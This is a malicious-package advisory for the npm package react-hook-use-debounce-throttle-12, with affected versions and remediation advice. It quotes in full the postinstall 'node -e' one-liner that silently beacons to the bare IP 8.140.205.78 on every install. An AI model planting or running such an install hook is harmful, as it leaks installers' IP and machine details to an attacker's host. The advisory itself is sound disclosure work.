MAL-2026-5909

    Dashboard / Malicious Package / MAL-2026-5909

    MAL-2026-5909

    Published: 16 Jun 2026Last Modified: 21 Aug 2026Aliases: 
    GHSA-2x4w-64xc-78fv

    Summary: Malicious code in react-hook-use-debounce-throttle-12 (npm)

    Details: Source: amazon-inspector (b0a4d8a0470a3e7fcb2da7cdb29ba6412125924a486aa6f4a437ccfbeb5ca4af) package.json declares a postinstall hook that runs `node -e` to issue an HTTPS request to the bare IP 8.140.205.78 on port 80 with all errors silently swallowed: `require('https').request({hostname:'8.140.205.78',port:80,path:'/',method:'GET',timeout:3000}).on('error',function(){}).end()`. The package advertises itself as a React debounce/throttle hooks library and has no legitimate need for network activity at install time. The destination is a bare IPv4 address with no TLS, no publisher correlation, and no documented purpose; the request fires unconditionally on every `npm install`, leaking the installer's IP, install timing, and machine footprint to the operator of that host. Author metadata is a generic placeholder (`dev-utils <[email protected]>`) with a repository URL that does not resolve to a real project, and the package name carries a numeric suffix consistent with disposable republishes. The combination of an install-time beacon to attacker-controlled infrastructure, mismatched purpose, silent error handling, and placeholder publisher identity is a victim-enumeration/install-tracking attack. Source: ghsa-malware (dab16b6240517cd4cb59dc43b87bc0d7bcdc474405778564b40311d7fe641d19) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

    Affected packages

    Package

    Name: react-hook-use-debounce-throttle-12

    Purl: pkg:npm/react-hook-use-debounce-throttle-12

    Affected ranges

    Type: SEMVER

    Events:

    Introduced- 0
    Fixed -None

    Affected versions

    1.0.0
    1.0.2
    1.0.1
    MAL-2026-5909 | CVE-DB